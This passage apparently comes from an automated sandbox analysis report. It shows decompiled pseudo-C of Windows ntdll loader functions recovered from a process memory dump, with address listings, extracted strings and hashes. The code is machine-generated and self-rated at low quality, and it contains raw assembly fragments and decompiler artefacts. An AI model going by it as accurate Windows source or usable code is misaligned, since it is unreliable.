                                                                      									if(L013243C0( &_v68,  &_v24) != 0) {
                                                                      										_t280 =  &(_t280[0]);
                                                                      									}
                                                                      								}
                                                                      								if(_t280 == 0) {
                                                                      									_t280 = 0;
                                                                      									L013377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                                                      									_v44 = 0;
                                                                      									_v32 = 0;
                                                                      								} else {
                                                                      									_t280 = 0;
                                                                      								}
                                                                      								_t174 = _v8;
                                                                      								if(_v8 != 0) {
                                                                      									L013377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                                                      								}
                                                                      								_v8 = _t280;
                                                                      								goto L46;
                                                                      							}
                                                                      							_t243 = _v48;
                                                                      							do {
                                                                      								 *_t277 = 0;
                                                                      								_t278 = _t277 + 2;
                                                                      								E0135BB40(_t257,  &_v68, _t243);
                                                                      								if(L013243C0( &_v68,  &_v24) != 0) {
                                                                      									_t280 =  &(_t280[0]);
                                                                      								}
                                                                      								_t243 = _t278;
                                                                      								_t277 = E01361370(_t278, 0x12f4e90);
                                                                      								_pop(_t257);
                                                                      							} while (_t277 != 0);
                                                                      							_v48 = _t243;
                                                                      							_t242 = _v52;
                                                                      							goto L38;
                                                                      						}
                                                                      					}
                                                                      					_t191 = _v12;
                                                                      					_t260 = _v12 + 4;
                                                                      					_v28 = _t260;
                                                                      					if(_t260 == 0) {
                                                                      						_t275 = _t280;
                                                                      						_v16 = _t280;
                                                                      					} else {
                                                                      						_t275 = L01334620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                                                      						_t191 = _v12;
                                                                      						_v16 = _t275;
                                                                      					}
                                                                      					if(_t275 == 0) {
                                                                      						_v28 = _t280;
                                                                      						_t280 = 0xc0000017;
                                                                      						goto L47;
                                                                      					} else {
                                                                      						E0135F3E0(_t275, _v8, _t191);
                                                                      						_t285 = _t285 + 0xc;
                                                                      						_v48 = _t275;
                                                                      						_t279 = _t280;
                                                                      						_t281 = E01361370(_v16, 0x12f4e90);
                                                                      						_pop(_t262);
                                                                      						if(_t281 != 0) {
                                                                      							_t244 = _v48;
                                                                      							do {
                                                                      								 *_t281 = 0;
                                                                      								_t282 = _t281 + 2;
                                                                      								E0135BB40(_t262,  &_v68, _t244);
                                                                      								if(L013243C0( &_v68,  &_v24) != 0) {
                                                                      									_t279 =  &(_t279[0]);
                                                                      								}
                                                                      								_t244 = _t282;
                                                                      								_t281 = E01361370(_t282, 0x12f4e90);
                                                                      								_pop(_t262);
                                                                      							} while (_t281 != 0);
                                                                      							_v48 = _t244;
                                                                      							_t242 = _v52;
                                                                      						}
                                                                      						_t201 = _v48;
                                                                      						_t280 = 0;
                                                                      						if( *_v48 != 0) {
                                                                      							E0135BB40(_t262,  &_v68, _t201);
                                                                      							if(L013243C0( &_v68,  &_v24) != 0) {
                                                                      								_t279 =  &(_t279[0]);
                                                                      							}
                                                                      						}
                                                                      						if(_t279 == 0) {
                                                                      							L013377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                                                      							_v28 = _t280;
                                                                      							_v16 = _t280;
                                                                      						}
                                                                      						_t202 = _v8;
                                                                      						if(_v8 != 0) {
                                                                      							L013377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                                                      						}
                                                                      						_v8 = _t280;
                                                                      						goto L28;
                                                                      					}
                                                                      				}
                                                                      				_t214 = _v12;
                                                                      				_t264 = _v12 + 4;
                                                                      				_v40 = _t264;
                                                                      				if(_t264 == 0) {
                                                                      					_v20 = _t280;
                                                                      				} else {
                                                                      					_t236 = L01334620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                                                      					_t280 = _t236;
                                                                      					_v20 = _t236;
                                                                      					_t214 = _v12;
                                                                      				}
                                                                      				if(_t280 == 0) {
                                                                      					_t161 = 0;
                                                                      					_t280 = 0xc0000017;
                                                                      					_v40 = 0;
                                                                      					goto L48;
                                                                      				} else {
                                                                      					E0135F3E0(_t280, _v8, _t214);
                                                                      					_t285 = _t285 + 0xc;
                                                                      					_v48 = _t280;
                                                                      					_t283 = E01361370(_t280, 0x12f4e90);
                                                                      					_pop(_t267);
                                                                      					if(_t283 != 0) {
                                                                      						_t245 = _v48;
                                                                      						do {
                                                                      							 *_t283 = 0;
                                                                      							_t284 = _t283 + 2;
                                                                      							E0135BB40(_t267,  &_v68, _t245);
                                                                      							if(L013243C0( &_v68,  &_v24) != 0) {
                                                                      								_t275 = _t275 + 1;
                                                                      							}
                                                                      							_t245 = _t284;
                                                                      							_t283 = E01361370(_t284, 0x12f4e90);
                                                                      							_pop(_t267);
                                                                      						} while (_t283 != 0);
                                                                      						_v48 = _t245;
                                                                      						_t242 = _v52;
                                                                      					}
                                                                      					_t224 = _v48;
                                                                      					_t280 = 0;
                                                                      					if( *_v48 != 0) {
                                                                      						E0135BB40(_t267,  &_v68, _t224);
                                                                      						if(L013243C0( &_v68,  &_v24) != 0) {
                                                                      							_t275 = _t275 + 1;
                                                                      						}
                                                                      					}
                                                                      					if(_t275 == 0) {
                                                                      						L013377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                                                      						_v40 = _t280;
                                                                      						_v20 = _t280;
                                                                      					}
                                                                      					_t225 = _v8;
                                                                      					if(_v8 != 0) {
                                                                      						L013377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                                                      					}
                                                                      					_v8 = _t280;
                                                                      					goto L16;
                                                                      				}
                                                                      			}










































                                                                      0x01323d3c
                                                                      0x01323d42
                                                                      0x01323d44
                                                                      0x01323d46
                                                                      0x01323d49
                                                                      0x01323d4c
                                                                      0x01323d4f
                                                                      0x01323d52
                                                                      0x01323d55
                                                                      0x01323d58
                                                                      0x01323d5b
                                                                      0x01323d5f
                                                                      0x01323d61
                                                                      0x01323d66
                                                                      0x01378213
                                                                      0x01378218
                                                                      0x01324085
                                                                      0x01324088
                                                                      0x0132408e
                                                                      0x01324094
                                                                      0x0132409a
                                                                      0x013240a0
                                                                      0x013240a6
                                                                      0x013240a9
                                                                      0x013240af
                                                                      0x013240b6
                                                                      0x013240bd
                                                                      0x013240bd
                                                                      0x01323d83
                                                                      0x0137821f
                                                                      0x01378229
                                                                      0x01378238
                                                                      0x01378238
                                                                      0x0137823d
                                                                      0x0137823d
                                                                      0x01323da0
                                                                      0x01323daf
                                                                      0x01323db5
                                                                      0x01323dba
                                                                      0x01323dba
                                                                      0x01323dd4
                                                                      0x01323e94
                                                                      0x01323eab
                                                                      0x01323f6d
                                                                      0x01323f84
                                                                      0x0132406b
                                                                      0x0132406b
                                                                      0x0132406e
                                                                      0x0132406e
                                                                      0x01324070
                                                                      0x01324074
                                                                      0x01378351
                                                                      0x01378351
                                                                      0x0132407a
                                                                      0x0132407f
                                                                      0x0137835d
                                                                      0x01378370
                                                                      0x01378377
                                                                      0x01378379
                                                                      0x0137837c
                                                                      0x0137837c
                                                                      0x0137835d
                                                                      0x00000000
                                                                      0x0132407f
                                                                      0x01323f8a
                                                                      0x01323f8d
                                                                      0x01323f90
                                                                      0x01323f95
                                                                      0x0137830d
                                                                      0x0137830f
                                                                      0x01323f9b
                                                                      0x01323fac
                                                                      0x01323fae
                                                                      0x01323fb1
                                                                      0x01323fb1
                                                                      0x01323fb6
                                                                      0x01378317
                                                                      0x0137831a
                                                                      0x00000000
                                                                      0x01323fbc
                                                                      0x01323fc1
                                                                      0x01323fc9
                                                                      0x01323fd7
                                                                      0x01323fda
                                                                      0x01323fdd
                                                                      0x01324021
                                                                      0x01324021
                                                                      0x01324029
                                                                      0x01324030
                                                                      0x01324044
                                                                      0x01324046
                                                                      0x01324046
                                                                      0x01324044
                                                                      0x01324049
                                                                      0x01378327
                                                                      0x01378334
                                                                      0x01378339
                                                                      0x0137833c
                                                                      0x0132404f
                                                                      0x0132404f
                                                                      0x0132404f
                                                                      0x01324051
                                                                      0x01324056
                                                                      0x01324063
                                                                      0x01324063
                                                                      0x01324068
                                                                      0x00000000
                                                                      0x01324068
                                                                      0x01323fdf
                                                                      0x01323fe2
                                                                      0x01323fe4
                                                                      0x01323fe7
                                                                      0x01323fef
                                                                      0x01324003
                                                                      0x01324005
                                                                      0x01324005
                                                                      0x0132400c
                                                                      0x01324013
                                                                      0x01324016
                                                                      0x01324017
                                                                      0x0132401b
                                                                      0x0132401e
                                                                      0x00000000
                                                                      0x0132401e
                                                                      0x01323fb6
                                                                      0x01323eb1
                                                                      0x01323eb4
                                                                      0x01323eb7
                                                                      0x01323ebc
                                                                      0x013782a9
                                                                      0x013782ab
                                                                      0x01323ec2
                                                                      0x01323ed3
                                                                      0x01323ed5
                                                                      0x01323ed8
                                                                      0x01323ed8
                                                                      0x01323edd
                                                                      0x013782b3
                                                                      0x013782b6
                                                                      0x00000000
                                                                      0x01323ee3
                                                                      0x01323ee8
                                                                      0x01323eed
                                                                      0x01323ef0
                                                                      0x01323ef3
                                                                      0x01323f02
                                                                      0x01323f05
                                                                      0x01323f08
                                                                      0x013782c0
                                                                      0x013782c3
                                                                      0x013782c5
                                                                      0x013782c8
                                                                      0x013782d0
                                                                      0x013782e4
                                                                      0x013782e6
                                                                      0x013782e6
                                                                      0x013782ed
                                                                      0x013782f4
                                                                      0x013782f7
                                                                      0x013782f8
                                                                      0x013782fc
                                                                      0x013782ff
                                                                      0x013782ff
                                                                      0x01323f0e
                                                                      0x01323f11
                                                                      0x01323f16
                                                                      0x01323f1d
                                                                      0x01323f31
                                                                      0x01378307
                                                                      0x01378307
                                                                      0x01323f31
                                                                      0x01323f39
                                                                      0x01323f48
                                                                      0x01323f4d
                                                                      0x01323f50
                                                                      0x01323f50
                                                                      0x01323f53
                                                                      0x01323f58
                                                                      0x01323f65
                                                                      0x01323f65
                                                                      0x01323f6a
                                                                      0x00000000
                                                                      0x01323f6a
                                                                      0x01323edd
                                                                      0x01323dda
                                                                      0x01323ddd
                                                                      0x01323de0
                                                                      0x01323de5
                                                                      0x01378245
                                                                      0x01323deb
                                                                      0x01323df7
                                                                      0x01323dfc
                                                                      0x01323dfe
                                                                      0x01323e01
                                                                      0x01323e01
                                                                      0x01323e06
                                                                      0x0137824d
                                                                      0x0137824f
                                                                      0x01378254
                                                                      0x00000000
                                                                      0x01323e0c
                                                                      0x01323e11
                                                                      0x01323e16
                                                                      0x01323e19
                                                                      0x01323e29
                                                                      0x01323e2c
                                                                      0x01323e2f
                                                                      0x0137825c
                                                                      0x0137825f
                                                                      0x01378261
                                                                      0x01378264
                                                                      0x0137826c
                                                                      0x01378280
                                                                      0x01378282
                                                                      0x01378282
                                                                      0x01378289
                                                                      0x01378290
                                                                      0x01378293
                                                                      0x01378294
                                                                      0x01378298
                                                                      0x0137829b
                                                                      0x0137829b
                                                                      0x01323e35
                                                                      0x01323e38
                                                                      0x01323e3d
                                                                      0x01323e44
                                                                      0x01323e58
                                                                      0x013782a3
                                                                      0x013782a3
                                                                      0x01323e58
                                                                      0x01323e60
                                                                      0x01323e6f
                                                                      0x01323e74
                                                                      0x01323e77
                                                                      0x01323e77
                                                                      0x01323e7a
                                                                      0x01323e7f
                                                                      0x01323e8c
                                                                      0x01323e8c
                                                                      0x01323e91
                                                                      0x00000000
                                                                      0x01323e91

                                                                      Strings
                                                                      • Kernel-MUI-Language-SKU, xrefs: 01323F70
                                                                      • Kernel-MUI-Language-Disallowed, xrefs: 01323E97
                                                                      • Kernel-MUI-Number-Allowed, xrefs: 01323D8C
                                                                      • Kernel-MUI-Language-Allowed, xrefs: 01323DC0
                                                                      • WindowsExcludedProcs, xrefs: 01323D6F
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                      • API String ID: 0-258546922
                                                                      • Opcode ID: 3759cfd38347148a6b8f872d4f643bc0c53bd87ccdb8d5cc02586a0d8ec6894c
                                                                      • Instruction ID: c0d7e42f45f46c9151f2be2693c128fa6949b39e7dbd18419e9e9b2b965204be
                                                                      • Opcode Fuzzy Hash: 3759cfd38347148a6b8f872d4f643bc0c53bd87ccdb8d5cc02586a0d8ec6894c
                                                                      • Instruction Fuzzy Hash: 7BF14C72D00629EFCB11EF98C984EEEBBBDFF48654F15416AE905A7210D7749E01CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 44%
                                                                      			E01348E00(void* __ecx) {
                                                                      				signed int _v8;
                                                                      				char _v12;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				intOrPtr* _t32;
                                                                      				intOrPtr _t35;
                                                                      				intOrPtr _t43;
                                                                      				void* _t46;
                                                                      				intOrPtr _t47;
                                                                      				void* _t48;
                                                                      				signed int _t49;
                                                                      				void* _t50;
                                                                      				intOrPtr* _t51;
                                                                      				signed int _t52;
                                                                      				void* _t53;
                                                                      				intOrPtr _t55;
                                                                      
                                                                      				_v8 =  *0x140d360 ^ _t52;
                                                                      				_t49 = 0;
                                                                      				_t48 = __ecx;
                                                                      				_t55 =  *0x1408464; // 0x73b80110
                                                                      				if(_t55 == 0) {
                                                                      					L9:
                                                                      					if( !_t49 >= 0) {
                                                                      						if(( *0x1405780 & 0x00000003) != 0) {
                                                                      							E01395510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                                                      						}
                                                                      						if(( *0x1405780 & 0x00000010) != 0) {
                                                                      							asm("int3");
                                                                      						}
                                                                      					}
                                                                      					return E0135B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                                                      				}
                                                                      				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                                                      				_t43 =  *0x1407984; // 0xdf2b78
                                                                      				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                                                      					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                                                      					if(_t48 == _t43) {
                                                                      						_t50 = 0x5c;
                                                                      						if( *_t32 == _t50) {
                                                                      							_t46 = 0x3f;
                                                                      							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                                                      								_t32 = _t32 + 8;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					_t51 =  *0x1408464; // 0x73b80110
                                                                      					 *0x140b1e0(_t47, _t32,  &_v12);
                                                                      					_t49 =  *_t51();
                                                                      					if(_t49 >= 0) {
                                                                      						L8:
                                                                      						_t35 = _v12;
                                                                      						if(_t35 != 0) {
                                                                      							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                                                      								E01349B10( *((intOrPtr*)(_t48 + 0x48)));
                                                                      								_t35 = _v12;
                                                                      							}
                                                                      							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                                                      						}
                                                                      						goto L9;
                                                                      					}
                                                                      					if(_t49 != 0xc000008a) {
                                                                      						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                                                      							if(_t49 != 0xc00000bb) {
                                                                      								goto L8;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					if(( *0x1405780 & 0x00000005) != 0) {
                                                                      						_push(_t49);
                                                                      						E01395510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                                                      						_t53 = _t53 + 0x1c;
                                                                      					}
                                                                      					_t49 = 0;
                                                                      					goto L8;
                                                                      				} else {
                                                                      					goto L9;
                                                                      				}
                                                                      			}




















                                                                      0x01348e0f
                                                                      0x01348e16
                                                                      0x01348e19
                                                                      0x01348e1b
                                                                      0x01348e21
                                                                      0x01348e7f
                                                                      0x01348e85
                                                                      0x01389354
                                                                      0x0138936c
                                                                      0x01389371
                                                                      0x0138937b
                                                                      0x01389381
                                                                      0x01389381
                                                                      0x0138937b
                                                                      0x01348e9d
                                                                      0x01348e9d
                                                                      0x01348e29
                                                                      0x01348e2c
                                                                      0x01348e38
                                                                      0x01348e3e
                                                                      0x01348e43
                                                                      0x01348eb5
                                                                      0x01348eb9
                                                                      0x013892aa
                                                                      0x013892af
                                                                      0x013892e8
                                                                      0x013892e8
                                                                      0x013892af
                                                                      0x01348eb9
                                                                      0x01348e45
                                                                      0x01348e53
                                                                      0x01348e5b
                                                                      0x01348e5f
                                                                      0x01348e78
                                                                      0x01348e78
                                                                      0x01348e7d
                                                                      0x01348ec3
                                                                      0x01348ecd
                                                                      0x01348ed2
                                                                      0x01348ed2
                                                                      0x01348ec5
                                                                      0x01348ec5
                                                                      0x00000000
                                                                      0x01348e7d
                                                                      0x01348e67
                                                                      0x01348ea4
                                                                      0x0138931a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01389320
                                                                      0x01348ea4
                                                                      0x01348e70
                                                                      0x01389325
                                                                      0x01389340
                                                                      0x01389345
                                                                      0x01389345
                                                                      0x01348e76
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000

                                                                      Strings
                                                                      • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0138932A
                                                                      • Querying the active activation context failed with status 0x%08lx, xrefs: 01389357
                                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 0138933B, 01389367
                                                                      • LdrpFindDllActivationContext, xrefs: 01389331, 0138935D
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                      • API String ID: 0-3779518884
                                                                      • Opcode ID: 0c44e9942c743e7c1e7a6f13b202c0e9f63debc68413386d9988107d5ac6115d
                                                                      • Instruction ID: b9c0e9f12dc491648b1446737ee94b6955b5bd63120e6f245771d65c02ffe639
                                                                      • Opcode Fuzzy Hash: 0c44e9942c743e7c1e7a6f13b202c0e9f63debc68413386d9988107d5ac6115d
                                                                      • Instruction Fuzzy Hash: DD410732A003159FEB37AB9D8849B36B7E5EB4465CF0641EDEA0C57561E770BDC08781
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 83%
                                                                      			E01328794(void* __ecx) {
                                                                      				signed int _v0;
                                                                      				char _v8;
                                                                      				signed int _v12;
                                                                      				void* _v16;
                                                                      				signed int _v20;
                                                                      				intOrPtr _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				signed int _v40;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				intOrPtr* _t77;
                                                                      				signed int _t80;
                                                                      				signed char _t81;
                                                                      				signed int _t87;
                                                                      				signed int _t91;
                                                                      				void* _t92;
                                                                      				void* _t94;
                                                                      				signed int _t95;
                                                                      				signed int _t103;
                                                                      				signed int _t105;
                                                                      				signed int _t110;
                                                                      				signed int _t118;
                                                                      				intOrPtr* _t121;
                                                                      				intOrPtr _t122;
                                                                      				signed int _t125;
                                                                      				signed int _t129;
                                                                      				signed int _t131;
                                                                      				signed int _t134;
                                                                      				signed int _t136;
                                                                      				signed int _t143;
                                                                      				signed int* _t147;
                                                                      				signed int _t151;
                                                                      				void* _t153;
                                                                      				signed int* _t157;
                                                                      				signed int _t159;
                                                                      				signed int _t161;
                                                                      				signed int _t166;
                                                                      				signed int _t168;
                                                                      
                                                                      				_push(__ecx);
                                                                      				_t153 = __ecx;
                                                                      				_t159 = 0;
                                                                      				_t121 = __ecx + 0x3c;
                                                                      				if( *_t121 == 0) {
                                                                      					L2:
                                                                      					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                                                                      					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                                                                      						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                                                      						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                                                      						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                                                                      							L6:
                                                                      							if(E0132934A() != 0) {
                                                                      								_t159 = E0139A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                                                      								__eflags = _t159;
                                                                      								if(_t159 < 0) {
                                                                      									_t81 =  *0x1405780; // 0x0
                                                                      									__eflags = _t81 & 0x00000003;
                                                                      									if((_t81 & 0x00000003) != 0) {
                                                                      										_push(_t159);
                                                                      										E01395510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                                                      										_t81 =  *0x1405780; // 0x0
                                                                      									}
                                                                      									__eflags = _t81 & 0x00000010;
                                                                      									if((_t81 & 0x00000010) != 0) {
                                                                      										asm("int3");
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						} else {
                                                                      							_t159 = E0132849B(0, _t122, _t153, _t159, _t180);
                                                                      							if(_t159 >= 0) {
                                                                      								goto L6;
                                                                      							}
                                                                      						}
                                                                      						_t80 = _t159;
                                                                      						goto L8;
                                                                      					} else {
                                                                      						_t125 = 0x13;
                                                                      						asm("int 0x29");
                                                                      						_push(0);
                                                                      						_push(_t159);
                                                                      						_t161 = _t125;
                                                                      						_t87 =  *( *[fs:0x30] + 0x1e8);
                                                                      						_t143 = 0;
                                                                      						_v40 = _t161;
                                                                      						_t118 = 0;
                                                                      						_push(_t153);
                                                                      						__eflags = _t87;
                                                                      						if(_t87 != 0) {
                                                                      							_t118 = _t87 + 0x5d8;
                                                                      							__eflags = _t118;
                                                                      							if(_t118 == 0) {
                                                                      								L46:
                                                                      								_t118 = 0;
                                                                      							} else {
                                                                      								__eflags =  *(_t118 + 0x30);
                                                                      								if( *(_t118 + 0x30) == 0) {
                                                                      									goto L46;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						_v32 = 0;
                                                                      						_v28 = 0;
                                                                      						_v16 = 0;
                                                                      						_v20 = 0;
                                                                      						_v12 = 0;
                                                                      						__eflags = _t118;
                                                                      						if(_t118 != 0) {
                                                                      							__eflags = _t161;
                                                                      							if(_t161 != 0) {
                                                                      								__eflags =  *(_t118 + 8);
                                                                      								if( *(_t118 + 8) == 0) {
                                                                      									L22:
                                                                      									_t143 = 1;
                                                                      									__eflags = 1;
                                                                      								} else {
                                                                      									_t19 = _t118 + 0x40; // 0x40
                                                                      									_t156 = _t19;
                                                                      									E01328999(_t19,  &_v16);
                                                                      									__eflags = _v0;
                                                                      									if(_v0 != 0) {
                                                                      										__eflags = _v0 - 1;
                                                                      										if(_v0 != 1) {
                                                                      											goto L22;
                                                                      										} else {
                                                                      											_t128 =  *(_t161 + 0x64);
                                                                      											__eflags =  *(_t161 + 0x64);
                                                                      											if( *(_t161 + 0x64) == 0) {
                                                                      												goto L22;
                                                                      											} else {
                                                                      												E01328999(_t128,  &_v12);
                                                                      												_t147 = _v12;
                                                                      												_t91 = 0;
                                                                      												__eflags = 0;
                                                                      												_t129 =  *_t147;
                                                                      												while(1) {
                                                                      													__eflags =  *((intOrPtr*)(0x1405c60 + _t91 * 8)) - _t129;
                                                                      													if( *((intOrPtr*)(0x1405c60 + _t91 * 8)) == _t129) {
                                                                      														break;
                                                                      													}
                                                                      													_t91 = _t91 + 1;
                                                                      													__eflags = _t91 - 5;
                                                                      													if(_t91 < 5) {
                                                                      														continue;
                                                                      													} else {
                                                                      														_t131 = 0;
                                                                      														__eflags = 0;
                                                                      													}
                                                                      													L37:
                                                                      													__eflags = _t131;
                                                                      													if(_t131 != 0) {
                                                                      														goto L22;
                                                                      													} else {
                                                                      														__eflags = _v16 - _t147;
                                                                      														if(_v16 != _t147) {
                                                                      															goto L22;
                                                                      														} else {
                                                                      															E01332280(_t92, 0x14086cc);
                                                                      															_t94 = E013E9DFB( &_v20);
                                                                      															__eflags = _t94 - 1;
                                                                      															if(_t94 != 1) {
                                                                      															}
                                                                      															asm("movsd");
                                                                      															asm("movsd");
                                                                      															asm("movsd");
                                                                      															asm("movsd");
                                                                      															 *_t118 =  *_t118 + 1;
                                                                      															asm("adc dword [ebx+0x4], 0x0");
                                                                      															_t95 = E013461A0( &_v32);
                                                                      															__eflags = _t95;
                                                                      															if(_t95 != 0) {
                                                                      																__eflags = _v32 | _v28;
                                                                      																if((_v32 | _v28) != 0) {
                                                                      																	_t71 = _t118 + 0x40; // 0x3f
                                                                      																	_t134 = _t71;
                                                                      																	goto L55;
                                                                      																}
                                                                      															}
                                                                      															goto L30;
                                                                      														}
                                                                      													}
                                                                      													goto L56;
                                                                      												}
                                                                      												_t92 = 0x1405c64 + _t91 * 8;
                                                                      												asm("lock xadd [eax], ecx");
                                                                      												_t131 = (_t129 | 0xffffffff) - 1;
                                                                      												goto L37;
                                                                      											}
                                                                      										}
                                                                      										goto L56;
                                                                      									} else {
                                                                      										_t143 = E01328A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                                                      										__eflags = _t143;
                                                                      										if(_t143 != 0) {
                                                                      											_t157 = _v12;
                                                                      											_t103 = 0;
                                                                      											__eflags = 0;
                                                                      											_t136 =  &(_t157[1]);
                                                                      											 *(_t161 + 0x64) = _t136;
                                                                      											_t151 =  *_t157;
                                                                      											_v20 = _t136;
                                                                      											while(1) {
                                                                      												__eflags =  *((intOrPtr*)(0x1405c60 + _t103 * 8)) - _t151;
                                                                      												if( *((intOrPtr*)(0x1405c60 + _t103 * 8)) == _t151) {
                                                                      													break;
                                                                      												}
                                                                      												_t103 = _t103 + 1;
                                                                      												__eflags = _t103 - 5;
                                                                      												if(_t103 < 5) {
                                                                      													continue;
                                                                      												}
                                                                      												L21:
                                                                      												_t105 = E0135F380(_t136, 0x12f1184, 0x10);
                                                                      												__eflags = _t105;
                                                                      												if(_t105 != 0) {
                                                                      													__eflags =  *_t157 -  *_v16;
                                                                      													if( *_t157 >=  *_v16) {
                                                                      														goto L22;
                                                                      													} else {
                                                                      														asm("cdq");
                                                                      														_t166 = _t157[5] & 0x0000ffff;
                                                                      														_t108 = _t157[5] & 0x0000ffff;
                                                                      														asm("cdq");
                                                                      														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                                                      														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                                                      														if(__eflags > 0) {
                                                                      															L29:
                                                                      															E01332280(_t108, 0x14086cc);
                                                                      															 *_t118 =  *_t118 + 1;
                                                                      															_t42 = _t118 + 0x40; // 0x3f
                                                                      															_t156 = _t42;
                                                                      															asm("adc dword [ebx+0x4], 0x0");
                                                                      															asm("movsd");
                                                                      															asm("movsd");
                                                                      															asm("movsd");
                                                                      															asm("movsd");
                                                                      															_t110 = E013461A0( &_v32);
                                                                      															__eflags = _t110;
                                                                      															if(_t110 != 0) {
                                                                      																__eflags = _v32 | _v28;
                                                                      																if((_v32 | _v28) != 0) {
                                                                      																	_t134 = _v20;
                                                                      																	L55:
                                                                      																	E013E9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                                                      																}
                                                                      															}
                                                                      															L30:
                                                                      															 *_t118 =  *_t118 + 1;
                                                                      															asm("adc dword [ebx+0x4], 0x0");
                                                                      															E0132FFB0(_t118, _t156, 0x14086cc);
                                                                      															goto L22;
                                                                      														} else {
                                                                      															if(__eflags < 0) {
                                                                      																goto L22;
                                                                      															} else {
                                                                      																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                                                      																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                                                      																	goto L22;
                                                                      																} else {
                                                                      																	goto L29;
                                                                      																}
                                                                      															}
                                                                      														}
                                                                      													}
                                                                      													goto L56;
                                                                      												}
                                                                      												goto L22;
                                                                      											}
                                                                      											asm("lock inc dword [eax]");
                                                                      											goto L21;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						return _t143;
                                                                      					}
                                                                      				} else {
                                                                      					_push( &_v8);
                                                                      					_push( *((intOrPtr*)(__ecx + 0x50)));
                                                                      					_push(__ecx + 0x40);
                                                                      					_push(_t121);
                                                                      					_push(0xffffffff);
                                                                      					_t80 = E01359A00();
                                                                      					_t159 = _t80;
                                                                      					if(_t159 < 0) {
                                                                      						L8:
                                                                      						return _t80;
                                                                      					} else {
                                                                      						goto L2;
                                                                      					}
                                                                      				}
                                                                      				L56:
                                                                      			}












































                                                                      0x01328799
                                                                      0x0132879d
                                                                      0x013287a1
                                                                      0x013287a3
                                                                      0x013287a8
                                                                      0x013287c3
                                                                      0x013287c3
                                                                      0x013287c8
                                                                      0x013287d1
                                                                      0x013287d4
                                                                      0x013287d8
                                                                      0x013287e5
                                                                      0x013287ec
                                                                      0x01379bfe
                                                                      0x01379c00
